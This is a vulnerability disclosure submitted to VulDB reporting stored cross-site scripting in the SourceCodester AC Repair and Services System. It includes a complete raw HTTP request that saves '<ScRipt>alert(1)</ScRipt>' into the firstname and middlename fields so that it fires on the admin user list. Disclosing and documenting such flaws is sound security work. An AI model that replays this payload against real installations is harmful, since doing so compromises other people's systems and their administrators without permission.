Submit #180834: SourceCodester AC Repair and Services System Users.php cross site scripting info

TitelSourceCodester AC Repair and Services System Users.php cross site scripting
BeschreibungI discovered an xss vulnerability in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is in url/classes/Users.php?f=save. POST /php-acrss/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------248310740335140400871461243690 Content-Length: 1077 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=user/manage_user Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="id" 1 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="firstname" <ScRipt>alert(1)</ScRipt> -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="middlename" <ScRipt>alert(1)</ScRipt> -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="lastname" 123 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="username" 123 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="password" 123 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="type" 2 -----------------------------248310740335140400871461243690 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------248310740335140400871461243690-- This is a storage based xss vulnerability where anyone who wants to access url/php-acrss/admin/?page=user/list will receive pop-up windows because the xss code is directly concatenated into the source code. The repair method is to filter parameters such as username once, such as <,>, etc
Quelle⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
Benutzer
 fushuling (UID 45488)
Einreichung11.07.2023 18:14 (vor 3 Jahren)
Moderieren13.07.2023 11:49 (2 days later)
StatusAkzeptiert
VulDB Eintrag234013 [SourceCodester AC Repair and Services System 1.0 manage_user firstname/middlename Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Do you know our Splunk app?

Download it now for free!